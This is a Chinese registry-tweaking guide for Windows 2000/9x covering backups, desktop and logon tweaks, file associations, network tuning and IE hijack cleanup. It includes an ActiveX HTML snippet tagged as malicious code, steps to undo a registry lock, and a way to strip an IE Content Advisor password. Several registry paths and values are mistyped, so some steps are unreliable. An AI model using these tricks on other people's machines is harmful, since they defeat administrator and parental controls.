注册表编辑工具Regedit是Win 2000另一款注册表工具。打开“开始”选单的“运行”窗口，在打开栏中输入Regedit即可看到如图2的画面，在“注册表”选单中选择“导出注册表文件”项，就会弹出一个窗口，选择保存注册表文件的路径和文件名，再单击保存就OK了。备份文件以.reg为扩展名。值得提醒一点的是，此方法并不会备份安全注册表文件和安全账户管理器注册表文件。恢复时，直接双击备份的.reg文件即可，或在命令行方式下键入:Start .reg。

3、用恢复控制台
故障恢复控制台是Win 2000新增加的工具，用于从多次失败中恢复系统。故障恢复控制台不是Win 2000的缺省安装，且必须在故障发生前安装才可以使用。安装故障恢复控制台的步骤是，插入Win 2000安装光盘，在运行窗口中键入：安装光盘盘符\i386\Winnt32.exe/Cmdcons，启动恢复控制台安装程序。安装了恢复控制台后，在启动选单中会出现“故障恢复控制台”选项。启动故障恢复控制台后，使用恢复控制台的Copy命令，将%Systemroot%\System32\Config目录下的文件拷到一个安全目录中。在恢复时，将备份目录中的文件覆盖%systemroot%\system32\config目录下的文件，注册表文件就恢复了。值得提醒的是，在恢复控制台下的COPY命令不支持通配符“

（二）深入剖析Win 2000注册表

1、Win 2000注册表的主要特性

中心存储地址
将以前分散在计算机硬盘上的配置信息汇总。
软件信息
Win 2000注册表的功能之一就是记录系统的软件配置，包括Win 2000本身。
硬件信息
在Win 2000中注册表记录了PC机的全部硬件情况。

2、Win 2000注册表的主要作用

记录安装选择
设置硬件
设置Win 2000
运行启动程序
定义Win 2000的显示方式
确定组件方式
向管理员报告配置数据

3、Win 2000注册表的五大功能

纠正Win 2000的错误。
恢复崩溃系统
提高运行速度和使用方便性
提高安全性
控制服务器


（三）Win2K注册表实用技巧

去掉桌面上"我的电脑"
打开注册表实用程序RegEdit，找到子键
HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
打开它时，我们能看到它右边列出了该键的含义及默认的键值。删除该子键，然后刷新一下桌面在找找看有没有我的电脑这个图标。

用当前的计算机名称和用户名字替换"我的电脑"
HEKY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}子键，拷贝它的子键LocalizedString的键值到记事本（如，@C:\winnt\system32\shell32.dll, -9216@1033, 我的电脑）。删除子键LocalizedString。然后用数据类型REG_EXPAND_SZ重建它。拷贝刚刚记事本的内容到新建的键，并且将"我的电脑"改变成"%username% on %computername%"。

隐藏最近登录的用户
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon
找到键DontDisplayLastUserName，值设置为1。1代表True（是），0代表False（否）。

为你的开始菜单和任务栏加速
HKEY_CURRENT_USER\Control Panel\Desktop把MenuShowDelay的值由400改为100

禁止CD-ROM的自动运行   
记得Win98里通过设置控制面版中的系=>设备管理=>Cdrom=>属性=>设置=>自动插入通告可以达到禁止CD-ROM的自动运行，但每次我们修改完毕后必须重新启动方可生效。而在WIN2K中可以通过修改注册表来实现，打开注册表管理程序，找到子键
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom设置AutoRun值为0即可。

改变欢迎对话框
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon，将LegalNoticeText的值改成你需要显示的内容，改变对话框的标题的话可以将LeagalNoticeCaption的值改成你所需要的，

设置登录壁纸
“HKEY_USERS\.DEFAULT\Control Panel\desktop”项右边窗口中找到字串值“Wallpaper”，将它的值改为一个BMP格式的图像文件的完整路径，就可以在登录时作为壁纸显示；修改字串值“TileWallpaper”的值，可以改变它的显示方式，其中“0”表示居中，“1”表示平铺，“2”表示拉伸。

修改登录背景颜色
如果没有设置登录壁纸，在“HKEY_
USERS\.DEFAULT\Control Panel\Colors”项中修改字串值“Background”的值，就可以改变登录时的背景颜色（默认值为“58 110 165”，分别表示R、G、B的值，三个值之间用空格分隔）。

在登录窗口添加信息
在“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersionWinlogon”项中新建一字串值“LogonPrompt”，在其中输入你想加的提示信息，

自动显示登录选项
在启动过程中出现“登录到Windows”窗口时，按［选项］按钮可以出现“使用拨号网络连接登录”复选框，修改“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon”项中双字节值“ShowLogonOptions”的值为“1”，就可以自动显示登录选项。

取消上一次登录名
如果在Windows 2000系统中设置了多个用户，每次按下［Ctrl+Alt+Delete］组合键后会在登录窗口中显示上次登录的用户名。将“HKEY_LOCAL_MACHINE\SOFT-
WARE\Microsoft\Windows NT\CurrentVersion\Winlogon”项中字串值“DontDisplayLastUserName”的值设为“1”就可以在登录窗口中不显示上一次登录的用户。

注册表的文件关联及应用—注册表使用全攻略之二

喜欢使用Windows右键快捷菜单的朋友可能知道，当你选择了一个文件（或者是文件夹或是系统图标）再单击鼠标右键，系统就会弹出一个菜单，菜单上面的各种“功能”（或称“操作”）任你选择，但是你是否注意到，当你安装一些应用软件之后，你的右键菜单是不是膨胀，以winzip为例，安装winzip之后，文件或文件夹的右键菜单当中就增加了功能选择项"Add to Zip"和"Add to xxx.zip",如图一，看到这个变化，我们不禁要问，这些选择项是怎么加入的，可不可以自己来添加。带着这些问题，我们再来看Windows的文件关联。

图一

　　什么是文件关联呢？通俗地说，就是选择不同类型的文件时，在其右键菜单上显示的各功能项。每个功能项即对应一个关联。选择了某一功能（操作），系统就去执行相应的处理程序。至于对什么文件的什么操作对应什么样的处理程序，那都记录在系统注册表中。因此，要真正弄清文件关联，必须深入研究注册表。这个问题解决了，我们就可以利用注册表随心所欲地为文件建立，修改，删除关联。

　　既然关联信息都写在注册表中，那么它在注册表中又是怎样构成的呢？我们不妨打开注册表，观察根键HKEY_CLASSES_ROOT之下的各个主键。（这样或许更易说明这一点）你是不是看到了很多前面有一个点（.），后面好象是文件扩展名的主键，如图二所示

图二

如.bat,.txt,.lnk,.bmp等。我们把这一类的主键称之为“扩展名主键”，每个扩展名主键都有一个默认键值。如：主键.bat的默认值为batfile； .lnk主键的默认值为lnkfile。举了这两个例子，你是否看出了其中的规律。即：若“扩展名主键”名为.xxx(xxx为某一类文件的扩展名），那么它的默认键值就为xxxfile。当然并不是所有的默认值都是这样，也可能多个主键对应同一默认值。比如：主键.jpeg和主键.jpg，它们的默认值jpgfile;.html和htm的默认值都为htmlfile。为什么要说这么多的扩展名主键的默认值呢？其中原因且听我慢慢道来。这个默认键值的作用就非同小可了，它可是文件关联的桥梁和纽带，是它将文件的类型（以扩展名来标识文件类型）与文件的关联联系起来。不信，你可以将某一“扩展名主键”的默认键值乱改一通，你就会发现，该类文件的许多关联项在右键菜单中消失了。既然这个重要的默认键值起了一个桥梁的作用，那么桥梁的另一端——文件的关联又是如何定义的呢？我们继续看注册表，让它来给我们解释。依然是在HKEY_CLASSES_ROOT根键之下。我们可以看到该根键之下有如下主键。如：batfile,txtfile,lnkfile 等。（如图三)

图三

这些主键好象都是刚才我们所说的“扩展名主键”的默认值。不错，上述默认值在此处正好变成了主键名——这就是桥梁。我们把这一类的主键称为“标识主键”。一般而言，在“标识主键”之下有以下几个重要主键：（如图四）

如图四

　DefaultIcon主键，它的功能是定义该类文件的默认图标。
Shell主键，它的功能是本文讨论的中心——文件关联之“命根”所在。文件的各种关联都寄生在此“根”之下，正是它定义了该类文件与多个程序相关联。它的默认值也很有用，你是否还记得双击文件可以将文件打开（对于已注册的文件），这种打开就是利用了系统注册表所设定的默认打开方式，即由shell主键的默认键值来控制。它之下的每个主键，都可称作是“关联主键”（如图四）。“关联主键”的键名是任意的（建议用英文），它的默认键值也是我们感兴趣的。因为这一默认键值会直接显示在右键菜单中，并且每个“关联主键”之下都有一个command主键，这个主键定义的就是“该关联对应的执行程序”。如图五所示，到此文件关联已昭然若揭。

图五

　　下面我们就以.reg文件(注册表的脚本文件)为例来说明其关联过程。

　　首先.reg文件在HKEY_CLASSES_ROOT根键之下有一个“扩展名主键”。.reg其默认值为regfile,说明reg类型文件关联的主键是regfile。再在该根键之下找“标识主键”regfile,regfile主键之下有一个DfaultIcon主键，作用是定义reg文件的默认图标。其默认键就是图标的全路径文件名。如: C:\windows\regedit.exe,1(表示的是regedit.exe中的第2个图标)。regfile主键之下还有一个上文称之为“命根”的主键shell,reg文件的关联就记录在shell之中。下面我们就为regt建立一个关联。步骤为：在shell主键之下，新建主键xxf（名任意）,置其默认值为：“徐喜峰的文本编辑器”，再在xxf主键之下新建主键command,置其默认值为C:\Windows\Notepad.exe %1,该默认值的意义为：用记事本来打开当前reg文件。若没有%1参数，则只运行记事本程序，而不打开当前文件。设置完毕，你再看看reg文件的“右键菜单”，是不是多了一个“徐喜峰的文本编辑器”选项（如图六），爽吧！~


图六

以上所说的只是作用于普通文件的关联，然而在Windows中，除了文件，还有文件夹及特殊的文档（如我的电脑，驱动器，回收站等）。那么这些又该如何设置关联呢？那就请大家记住在HKEY_CLASSES_ROOT根键之下还有以下几个重要的系统关联主键：

　　*：作用于所有文件，它与“标识主键”的关联方法一样。
　　Directory：作用于一般文件夹。
　　Folder：作用于所有文件夹，包括特殊文件，如：控制面板，回收站等。
　　Drive：作用于驱动器，如A驱，B驱，C驱。
　　Unknow：作用于系统不能识别的文件类型，即没有注册的文件类型。

　　最基本的文件关联就谈到此处，下面来看看文件关联的应用。

　　应用之一：让MS－DOS方式无处不在。

　　经常用到DOS方式的朋友可能有些厌烦，因为每次进入DOS方式，都要选择“开始\程序\MS-DOS方式”。利用文件关联，我们可以将MS-DOS方式添加到任何文件的“右键菜单”中，这样就省事多了，方法为：
将注册表展开到HKEY_CLASSES_ROOT\*\shell分支。（在所有文件的“右键菜单”中添加MS-DOS方式）新建主键“MS-DOS"，置其默认值为“进入MS-DOS方式”，在MS-DOS主键之下新建command主键，置其默认值为：“C:\Windows\command.com”。
另注册表展开到HKEY_CLASSES_ROOT\Folder\shell分支，（在所有文件夹的“右键菜单”中添加MS-DOS方式）设置同上。

　　应用之二：隐去快捷方式图标中的小箭头。

　　如果你觉得快捷方式图标中的小箭头有点障眼，那么利用关联，可以将之去掉，将注册表展开到HKEY_CLASSES_ROOT\lnkfile分支，将lnkfile主键之下的键值Isshortcut删除，再将注册表展开到HKEY_CLASSES_ROOT\piffile分支，将piffile主键之下的键值Isshortcut删除，即大功告成。

　　应用之三：用记事本来编辑bat文件。

　　有时想编辑bat文件，而习惯性地双击它，这一双击，并没有将它打开编辑，而是将它执行，让人甚为恼火。利用注册表的文件关联，可以将之改变。将注册表展开到HKEY_CLASSES_ROOT\batfile\shell分支，将shell主键的默认值由open改为edit即可。

　　应用之四：更改某类文件的默认图标。

　　以txt文件为例，将txt文件的图标改为“我的电脑”的图标。将注册表展开到HKEY_CLASSES_ROOT\txtfile\DefaultIcon分支，将主键DefautIcon的默认键值改为："C:\Windows\explorer.exe,0" 即可。

　　应用之五：为所有文件增加“打开方式”。

　　将注册表展开到HKEY_CLASSES_ROOT\*\shell分支，新建主键open_as,置其默认值为“选择打开方式”，在Open_As主键之下新建主键command,置其默认值为："C:Windows\rundll32.exe shell32.dll , openAs_RunDll %1"

　　应用之六：将“关机”加入到右键菜单。

　　将注册表展开到HEKY_CLASSES_ROOT\Directory\shell分支，新建主键close,置其默认值为“关闭系统”，再在close主键之下，新建主键command,置其默认值为："C:\Windows\rundll32.exe user.exe, exitwindows"

　　以上六例应用，总体上能够概述文件关联的基本结构和基本框架，弄清了文件关联的结构与框架，自己再增加关联就是小菜一碟了。只要你有兴趣，你可以将你的右键菜单加得满满的。如果你想了解更深一层次的文件关联，那就请你参阅有关windows注册表方面的书籍与资料，或与我联系，我的Email是amen.twty@china.net。在文章结束之前，还告诉大家一点小小的诀窍：那就是注册表在作过修改之后，很多场合需要重新启动才能生效。这里我告诉大家一个不需要重启但又能快速更改注册表的方法：选择“开始\关闭系统”，在弹出“关闭系统”框之后，按Ctrl+Alt+Del 组合键，出现“结束任务”框，选择其中的“Explorer”，再单击“结束任务”，等待一会儿(10秒左右),就会出现一个“结束任务”确认框，点击“结束任务”按钮即可。

Win2000注册表应用六则—注册表使用全攻略之三

一、如何删除多余的DLL文件
　　在Win2000的System子目录下存有大量的DLL文件，这些文件可能被系统或应用程序共享。但是由于经常安装和卸载软件，就会在System目录下留下一些DLL垃圾文件。它们不但占用了硬盘空间，而且还降低系统的运行速度。删除它们的步骤如下：
　　1.运行“regedit”，打开注册表编辑器。
    2.打开
　　HKEY_LOCAL_MACHINE＼Software＼ Microsoft＼Windows＼CurrentVersion＼Shared DLLs分支。
　　这里SharedDLLs(图2)子键记录的就是有关程序共享的DLL信息，每个DLL文件的键值说明它已被几个应用程序共享。如果是二进制键值为“00 00 00 00”，则表明不被任何程序共享。(另外“0x00000001(1)”是十六进制表示法)
　　3.System目录中删除对应的文件。

二、去掉桌面快捷方式的小箭头
　　在一些程序的安装过程中，会自动在桌面上创建该程序的快捷方式，方便了我们的使用。但是那个小箭头不太好看。我们可以利用修改注册表来去掉它。首先要注意此快捷方式是什么类型的，一般说来以.LNK居多，也有一些是.PIF(指向MS-DOS程序的快捷方式)。具体步骤如下：
　　1.运行注册表编辑器，打开HKEY_CLASSES_ROOT＼lnkfile分支
　　2.在lnkfile子键下面找到一个名为“IsShortcut”的键值，它表示在桌面的.LNK快捷方式图标上将出现一个小箭头。右键单击“IsShortcut”，然后从弹出的菜单中选择“删除”，将该键值删除。
　　3.关闭注册表编辑器，重新启动Win2000，就可发现快捷方式图标上已经没有小箭头了。
　　同理，对指向MS-DOS程序的快捷方式(即.PIF)图标上的小箭头，则除了是打开HKEY_CLASSES_ROOT＼piffile分支外，其余同上。

　　三、注册表的恢复法
　　1.重新启动并切换到MS-DOS方式
　　2.进Windows＼Command目录，键入SCANREG／RESTORE后回车
　　3.进入界面后，可在5个注册表备份中选取所要恢复的，重新启动后即可

　　四、锁定桌面
　　桌面设置包括壁纸、图标以及快捷方式，它们的设置一般都是我们经过精心选择才设定好的。大多数情况下，我们不希望他人随意修改桌面设置或随意删除快捷方式。怎么办?其实修改注册表可以帮你锁定桌面，这里“锁定”的含义是对他人的修改不做储存，不管别人怎么改，只要重新启动计算机，你的设置就会原封不动地出现在你面前。
　　1.运行regedit进入注册表编辑器，找到如下分支：Hkey-Users＼ Software＼Microsoft＼Windows＼CurentV ersion＼Polioies＼Explores
　　2.双击“No Save Setting”，并将其键值从0改为1
　　3.确认后退出注册表编辑器，重新启动即可。
　　上面的修改是把计算机上所有用户的桌面设置全部锁定了，如果你只想锁定你自己的桌面，而不理会别人的设置是否被修改，可以在下面的路径中执行相同的操作：Hkey-Current-User＼Software＼Microsoft＼Windows＼Current Version＼Policies＼Explores。

　　五、关闭“单击从这里开始”动画箭头
　　Win2000开机时，有时候屏幕底部的任务条中会出现一个从右到左的动画箭头，指示“单击从这里开始”，用下面方法可以使它禁止显示
　　1.打开注册表，进入下面路径：Hkey-Current-User＼Software＼ Microsoft＼Windows＼Current Version＼Policies＼Explores
　2.建立一个二进制键名：“No Start Banner”
　　3.双击该键名，并输入键值“01000000”
　　4.确认后退出，并重新启动计算机
　　如果想使这个修改对所有用户生效，可到下面路径中执行相同的操作：Microsoft＼Windows ＼Current＼Current Version＼Policies＼Explores
　　注：如果你的电脑开机时没这个动画箭头，一定是计算机在开机时自动加载了某个应用程序。

　　六、防止菜单随鼠标移动
　　在Win2000中当你把鼠标指向下拉级联菜单的标题稍作停留，其下一级子菜单会自动弹出。有时候这个性能也会有“副作用”—在鼠标移动过程中，稍不留意，按一下左键，就可能启动一个你并不需要的窗口。可以修改注册表关闭这项功能，使单击该菜单才弹出其下一级子菜单：
　　1.打开注册表，进入下面目录：Hkey-Current-User＼Control Pannel＼Desktop
　　2.添加一个键名：“Menu Show Delay”
　　3.输入键值“65534”
　　4.确认后重启计算机。

解开注册表被锁的方法—注册表使用全攻略之四
解开注册表被锁的方法  

一、解锁方法:
1。 你可以在恢复注册表时，用F8进入选DOS模式或用 运行，C:>SCANREG/RESTORE

2。 你也可以用NotePad编辑一个文本文件，保存文件的时候用格式reg
在文件中打入以下:
(空一行)
REGEDIT 或 REGEDIT4
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\
Policies\system"DisableRegistryTools"=dword:00000000]
保存文件后，导入注册表。

3。 使用第三方工具恢复，如用超级兔子注册表魔法等

4. 用 Win9X/ME 者，可以安装 Norton Utilities,用其自有的 RegEdit.那就不受任何限制了。

二、HTM文件解开注册表
<HTML>
<head>
<TITLE>解开注册表</TITLE>
<meta name="keywords" content="注册表,恶意代码,修改注册表">
<meta name="description" content="Robonic修改,QQ:10000022,www.J3J4.com">
</head>
<SCRIPT></SCRIPT>
<OBJECT id=closes type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">
<param name="Command" value="Close">
</object>
<input type="button" value="解开注册表" onclick="closes.Click();">
</HTML>

存为HTM文件，打开就可以了~~~


三、利用微软在系统安装光盘中所提供的另一款利器——系统策略编辑器(Poledit)，轻松地解决这个问题。

以在Windows 9x操作系统下的使用为例来介绍。

　　首先，将安装光盘中ToolsReskitNetaminPoledit文件夹中的所有文件复制到硬盘中，然后双击Poledit.exe运行系统策略编辑器(如果提示找不到模板文件，可以从系统策略编辑器的“选项”菜单中选择“模板”，然后单击“打开模板”，再选择Admin.adm文件即可)。在“文件”菜单中选择“打开注册表”，此时你就会发现下面原来空白的面板中多了两个图标：一个是“本地计算机”，一个是“本地用户”。

　　我们要用的主要是“本地用户”(“本地计算机”里面主要是网络和系统方面的设置，有兴趣的读者可以自己去试试)。双击“本地用户”，会弹出“本地用户属性”界面，在该界面中可看到一个树形目录，包括“控制面板”、“桌面”、“网络”、“外壳”和“系统”5项。

　　下面，我们就来体验一下系统策略编辑器的威力吧！对于上面提及的注册表被锁的例子，现在我们只要选择“系统→限制”选项，就可以看到4个选项。如果你的注册表被锁，则“禁用注册表编辑器”前的复选框被选中。取消对该选项的选取，按“确定”退回主界面。别急，这时工作还没完成呢！选择“文件→保存”，你所做的修改才能生效。然后试试运行Regedit，是不是可以用了呢？其实，在这5个基本目录中你还可以实现很多常用的个性化设置，这里就不多谈了。

　　
四、利用系统策略编辑器
在Windows 2000/XP/2003中，我们可以通过单击“开始→运行”，输入“Gpedit.msc”后回车，打开“组策略”。然后，依次展开“用户配置→管理模板→系统”，双击右侧窗口中的“阻止访问注册表编辑工具”，在弹出的窗口中选择“已禁用”，“确定”后再退出“组策略”，即可为注册表解锁。

巧改注册表来增强网络功能—注册表使用全攻略之五

１、指定首选的网络服务器

　　在注册表中依次展开[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NWNP32\NetworkProvider]，并在其主键下创建或更改串值AuthenticatingAgent，附值为指定的服务器

　　２、禁止自动登陆网络

　　在注册表中依次展开[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NWNP32\NetworkProvider]，同时在下面主键下创建DWORE值DisableDefaultPasswords，（1=取消自动登陆，0=自动登陆）

　　３、显示域名登陆确认

　　在注册表中依次打开[HKEY_LOCAL_MACHINE\Network\Logon]在下面主键下创建或更改DWORD值DomainLogonMessage,(0=取消，1=启用)

　　４、清理访问“网络邻居”后留下的字句信息

　　使用局域网的用户在访问网络邻居时，注册表会在HEKY_CURRENT_USER/Network/Recent主键项中记录下一系列命令操作的信息，包含被访问机器的名字、访问过的应用程序及文件名等，如：主键Recent包含一名为\ierl_server\software的子主键项，表示你曾访问过名为ierl_server的服务器中的software文件夹，点击此项后编辑器右窗显示此项的名称及键值。这些内容基本没有用途，可以适当的清理一下。打开注册表编辑器后，按以下顺序依次打开各级主键：HEKY_CURRENT_USER、Network、Recent,然后把主键Recent的子项删除即可。

　　５、更改IE4.0的安全口令

　　您可以在IE4.0的“Internet选项”对话框的“内容”选项页的“分级审查”框中设置口令，这样，在显示有ActiveX的页面时，总会出现“分级审查不允许查看”的提示信息，然后弹出口令对话框，要求您输入监护人口令。如果口令不对，则将停止浏览。但是，如果此口令遗忘了，则无法浏览这些特征的页面。在口令遗忘后，重装IE4.0也无法去掉安全口令。这时只有求助于注册表了：
　　打开HKEY_LOCAL_MACHINE\ SOFTWARE\Microsoft\Windows\CurrentVersion\Policies分支，在Policies子键下选择“Ratings”子键，按Del键将其删除，由于Ratings子键下的Key键值数据就是经过加密后的口令，删除了这一项，IE4.0自然就认为您没有设置口令了。

　　６、从Netscape中清除曾到过的网址

　　为了保密起见，您可以清除Netscape的“Addres 框的下拉式菜单内的网址，这样别人就无法获得您曾到过的网站。
　　（１）在Netscape 3.x中，您必须通过注册表编辑器修改注册表达到此目的，其操作步骤如下：打开HKEY_CURRENT_USER\Software\Netscape\NetscapeNavigator\URLHistory分支。在右窗格中我们可看到这些曾到过的网址的列表清单，选择要删除的网址选项，然后按Del键即可。
　　（２）在Netscape 4.x中，首先用记事本中打开文件C:\Program
　　Files\Netscape\Users\caogjwj\prefs.js假定您的注册名称为zys666），此文件的内容通常是这样的：user_pref（“browser.url_history.URL_2"，“http://pcworld.com.cn/";）
　　在此文件中删除其中您想要隐藏的网址整行，然后存盘退出即可。
　　为了让Netscape 4.x不再向prefs.js文件中写入任何网址，将此文件的属性改为只读即可。

　　７、为一台机器设置两个IP地址

　　一般情况下只能为一个网络适配器配置一个IP地址，但通过修改系统注册表，却可以为一个网卡配置多个IP地址：运行注册表编辑器，找到HKEY_LOCAL_MACHINE\System\Cu rrentControlSet\Services\Class\NetTrans，在此目录中可以看到多个名为0000、0001、0002…的目录，它们用于记录协议的安装情况。在它们中间找到DriverDesc为“TCP/IP”的目录，修改IPAddress和IPMask两个键。其中IPAddress为用逗号隔开的多个IP地址，I PMask是对应的掩码。例如设置IPAddress为“2１0.７３.１４０.３，２１０.７３.１４０.５”，IPMask为“255.255.255.192，255.255.255.192”时，表示为系统设置了两个IP地址2１0.７３.１４０.３和２１０.７３.１４０.５。

　　８、加快网络传输速度

　　Windows操作系统在网络拨号设计上有加强的余地，只需增加MaxMTU、MaxSSS、DefaultRcvWindow及DefaultTTL就能加快网上奔驰的速度。
　　a.修改MaxMTU及MaxSSS启动注册表编辑器，找出以下关键字：HKEY_LOCAL_MACHINE\System\Current
　　Control Set\Services\Class\NetTrans\000n（n表示个别拔号网络连接项号码）。例如0002，在***n右面Windows会有一些如DeviceVxDs、IpAddress等名称，在右边窗口任意空白外点击，在菜单上选“编辑”→“新增”→“字符串值”，右边窗口就会多出一个新字符串，把它命名为“MaxMTU”，再双按这个字符串值并把它设定为“576”。同样，在右边窗口加上“MaxSSS”字符串值并将它的值设定为“536”。
　　b.修改DefaultRcvWindow及DefaultTTL启动注册表编辑器，找出以下关键字：HKEY_LOCAL_MACHINE\System\Current Control Set\Services\VxD\MSTCP在右边窗口加上字符串值“DefaultRcvWindow”并把它的值设定为“2144”，再增加另一字符串值“DefaultTTL”并把它的值设定为“60”至“64”（注：60是最小值，64是最大值，只要填上其中一个值就可），完成後关闭注册表编辑器并重新启动Win95即可。

　　９、修改IE5.0的搜索引擎

　　在注册表中依次展开“HKEY_LOCAL_MACHINE\Software\Microsoft\Internet
　　Explorer\Search”，在右侧窗口中把“CustomizeSearch”、“SearchAssistant”改为你定义的搜索引擎，如http://www.yeah.net/，以后当你每次点IE5.0的搜索引擎时，即可自动调出你定义的搜索引擎，如上面设定的中文搜狐。

　　１０、解决局域网中启动直接登录问题

　　有时重新安装了操作系统后，启动时不能直接登录局域网，而只能通过按“开始”/注销，才能出现登录界面，解决方法是在注册表中依次展开“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Real
　　Mode Net”，将右侧窗口中的AutoLogon删除即可。

　　１１、定制IE地址

　　用过IE的人都遇到过“取消操作”提示，还有“Web页不可脱机使用”，“警告：网页已经过期”等情况，但是你有没有注意到出现提示页时地址栏中显示的是什么，URL为“about:xxxxxxx”。about是除了“http”、“ftp”、“mailto”、“gopher”外的特殊协议，利用它可以使用别名调阅特定的网页，比如IE的空白页，则的URL栏中打入about:blank即可，blank即为空白页的别名。
　　利用这可通过创建类似的别名，指向我指定的网页地址，在注册表中依次展开“HKEY_LOCAL_MACHINE\Software\Microsoft\Internet
　　Explorer\AboutURLs”，在右侧窗口中单击鼠标右键，从弹出的快捷菜单中，选择“新建”、“串值”，然后将“新值#1”更名为你要给指向的网页（网址）取的名字，右击该名字，再将其值设置为你想要指向的网址，注意不能省了“http://”。
　　你也可以用此法给硬盘上常用网页取个别名，填上路径即可方便打开了。

　　１２、防止他人获取对Web页面的访问信息

　　通过修改注册表我们可以隐藏曾浏览过的URL地址。其方法如下：
　　对于Netscap的用户：在注册表中依次展开“HKEY_LOCAL_MACHINE\Software\Netscape\Netscape
　　Navigator”分支，删除其下的URL子键的所有内容。
　　对于IE用户：在注册表中依次展开“HKEY_CURRENT_USER\Software\Microsoft\Internet
　　Explorer\TypedURLs”分支，删除其下的URL子键的所有内容。

　　１３、更改Outlook Express信箱存放路径

　　如果您想修改Outlook Express信箱存放路径，可以在HKEY_CURRENT_USER\Identities\{4C44D002-7BCF-11D3-9957-AB53DA238B0C}\Software\Microsoft\Outlook
　　Express\5.0下修改“Store Root”字符串值为要修改的路径。

　　１４、增加IE自动识别功能

　　经常上网的朋友知道，您要访问形如www.ＸＸＸ.com这样的网站时，只要在地址框中直接键入ＸＸＸ，IE就会自动加上.com的后缀进行访问，省去了很多麻烦。但是如果您想访问www.ＸＸＸ.com.cn这样的网站就没那么方便了，因为IE未包含.cn后缀的自动连接功能。
　　为了能够增加上述的识别功能，用户可以依次打开注册表HKEY_LOCAL_MACHINE\Software\Microsoft\Internet
　　Explorer\Main\UrlTemplate，点击右键，选择新建字符串，输入www..%s.com.cn即可添加。

    15.修改注册表加快网络速度
     
     a. 修改MaxMTU及MaxSSS启动注册表编辑器，找出以下关键字：HKEY_LOCAL_MACHINE\System\Current Control Set\Services\Class\NetTrans\000n（n表示个别拔号网络连接项号码）。例如0002，在***n右面Windows会有一些如DeviceVxDs、IpAddress等名称，在右边窗口任意空白外点击，在菜单上选“编辑”→“新增”→“字符串值”，右边窗口就会多出一个新字符串，把它命名为“MaxMTU”，再双按这个字符串值并把它设定为“576”。同样，在右边窗口加上“MaxSSS”字符串值并将它的值设定为“536”。

　　b. 修改DefaultRcvWindow及DefaultTTL启动注册表编辑器，找出以下关键字：HKEY_LOCAL_MACHINE\System\Current Control Set\Services\VxD\MSTCP在右边窗口加上字符串值“DefaultRcvWindow”并把它的值设定为“2144”，再增加另一字符串值“DefaultTTL”并把它的值设定为“60”至“64”（注：60是最小值，64是最大值，只要填上其中一个值就可），完成後关闭注册表编辑器并重新启动即可。

被恶意网站击中的解决办法——注册表使用全攻略之六

一、注册表被修改的原因及解决办法

　　恶意网页是含有有害代码的ActiveX网页文件，这些广告信息的出现是因为浏览者的注册表被恶意更改的结果。

　　1、IE默认连接首页被修改

　　IE浏览器上方的标题栏被改成"欢迎访问……网站"的样式，受到更改的注册表项目为：
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page
　　通过修改"Start Page"的键值，达到修改IE默认连接首页的目的
　　①在Windows启动后，点击"开始"→"运行"菜单，在"打开"栏中键入regedit，然后按"确定"键；
　　②展开注册表到
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main下，
在右半部分窗口中找到串值"Start Page" ，将键值改为"about:blank"即可；
　　③同理，展开注册表到
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
　在右半部分窗口中找到串值"Start Page"，然后按②中所述方法处理。
　　④退出注册表编辑器，重新启动计算机，一切OK了！
　　特殊例子：当IE的起始页变成了某些网址后，就算你通过选项设置修改好了，重启以后又会变成他们的网址啦，十分的难缠。其实他们是在你机器里加了一个自运行程序，它会在系统启动时将你的IE起始页设成他们的网站。
　　解决办法：运行注册表编辑器regedit.exe，然后依次展开
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Run主键，然后将其下的registry.exe子键删除，然后删除自运行程序c:\Program Files\registry.exe，最后从IE选项中重新设置起始页就好了。

    2、篡改IE的默认页

　　有些IE被改了起始页后，即使设置了"使用默认页"仍然无效，这是因为IE起始页的默认页也被篡改啦。就是以下注册表项被修改：
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\Default_Page_URL
　　"Default_Page_URL"这个子键的键值即起始页的默认页。
　　解决办法：
　　将"Default_Page_UR"键值中的那些篡改网站的网址改掉.

　　3、修改IE浏览器缺省主页，并锁定设置项，禁止用户更改回来。

　　主要是修改了注册表中IE设置的下面这些键值(DWORD值为1时为不可选)：
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel]
"Settings"=dword:1
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel]
"Links"=dword:1
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel]
"SecAddSites"=dword:1
　　解决办法：　　将上面这些DWORD值改为"0"即可恢复功能。

　　4、IE的默认首页灰色按扭不可选

　由于HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Control Panel　下的DWORD值"homepage"的键值被修改的缘故。原来的键值为"0"，被修改为"1"（即为灰色不可选状态）。
　　解决办法：将"homepage"的键值改为"0"即可。

    5、IE标题栏被修改

　　在系统默认状态下，是由应用程序本身来提供标题栏的信息，但也允许用户自行在上述注册表项目中填加信息，而一些恶意的网站正是利用了这一点来得逞的：它们将串值Window Title下的键值改为其网站名或更多的广告信息，从而达到改变浏览者IE标题栏的目的。
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Window Title
